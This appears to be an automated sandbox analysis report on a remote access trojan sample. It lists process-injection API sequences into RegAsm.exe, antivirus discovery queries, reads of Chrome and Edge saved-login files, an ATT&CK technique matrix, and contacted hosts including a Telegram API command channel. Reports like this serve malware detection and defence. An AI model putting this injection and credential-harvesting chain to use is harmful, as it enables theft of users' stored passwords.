                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CCB170 _Smanip,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,GetExitCodeProcess,FreeLibrary,FreeLibrary,2_2_00CCB170
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BBD008Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: EnumSystemLocalesW,0_2_002EB2AD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: EnumSystemLocalesW,0_2_002EB2F8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetLocaleInfoW,0_2_002E22D0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: EnumSystemLocalesW,0_2_002EB393
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_002EB41E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetLocaleInfoW,0_2_002EB672
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_002EB797
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetLocaleInfoW,0_2_002EB89D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_002EB979
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: EnumSystemLocalesW,0_2_002E1E74
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_002EAFFB
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetLocaleInfoW,2_2_00CE22D0
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: EnumSystemLocalesW,2_2_00CEB2F8
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: EnumSystemLocalesW,2_2_00CEB2AD
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: EnumSystemLocalesW,2_2_00CEB393
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00CEB41E
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetLocaleInfoW,2_2_00CEB672
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00CEB797
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetLocaleInfoW,2_2_00CEB89D
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00CEB979
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: EnumSystemLocalesW,2_2_00CE1E74
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,2_2_00CEAFFB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002D5662 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_002D5662
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: RegAsm.exe, 00000003.00000002.1454171582.0000000000E69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 3.2.RegAsm.exe.7c30000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.7c30000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1458106841.0000000007C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5384, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 6296, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5384, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 5604, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 1572, type: MEMORYSTR
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1455196858.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 6296, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5384, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 5604, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 1572, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 3.2.RegAsm.exe.7c30000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.7c30000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1458106841.0000000007C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5384, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 6296, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5384, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 5604, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 1572, type: MEMORYSTR
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1455196858.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 6296, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5384, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 5604, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 1572, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts11
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                1
                DLL Side-Loading
                411
                Process Injection
                11
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                2
                File and Directory Discovery
                Remote Desktop Protocol1
                Data from Local System
                2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Registry Run Keys / Startup Folder
                1
                Registry Run Keys / Startup Folder
                31
                Obfuscated Files or Information
                Security Account Manager24
                System Information Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Software Packing
                NTDS241
                Security Software Discovery
                Distributed Component Object Model1
                Input Capture
                1
                Non-Standard Port
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                Process Discovery
                SSH1
                Clipboard Data
                2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture13
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Modify Registry
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1639673 Sample: SecuriteInfo.com.Win32.RATX... Startdate: 16/03/2025 Architecture: WINDOWS Score: 100 40 api.telegram.org 2->40 42 pki-goog.l.google.com 2->42 44 3 other IPs or domains 2->44 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 62 12 other signatures 2->62 10 SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe 3 2->10         started        13 SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe 12 2->13         started        16 SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe 12 2->16         started        signatures3 60 Uses the Telegram API (likely for C&C communication) 40->60 process4 dnsIp5 36 SecuriteInfo.com.W...-gen.1407.14828.exe, PE32 10->36 dropped 38 SecuriteInfo.com.W...exe:Zone.Identifier, ASCII 10->38 dropped 18 SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe 1 13 10->18         started        52 185.166.143.48, 443, 49685, 49692 AMAZON-02US Germany 13->52 22 RegAsm.exe 13->22         started        24 MSBuild.exe 16->24         started        file6 process7 dnsIp8 46 bitbucket.org 185.166.143.50, 443, 49682 AMAZON-02US Germany 18->46 64 Multi AV Scanner detection for dropped file 18->64 66 Contains functionality to inject code into remote processes 18->66 68 Writes to foreign memory regions 18->68 70 2 other signatures 18->70 26 RegAsm.exe 17 3 18->26         started        signatures9 process10 dnsIp11 48 38.68.49.150, 49684, 49686, 49698 MAJESTIC-HOSTING-01US United States 26->48 50 api.telegram.org 149.154.167.220, 443, 49683 TELEGRAMRU United Kingdom 26->50 72 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->72 74 Tries to harvest and steal browser information (history, passwords, etc) 26->74 30 cmd.exe 1 26->30         started        signatures12 process13 process14 32 conhost.exe 30->32         started        34 timeout.exe 1 30->34         started       

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.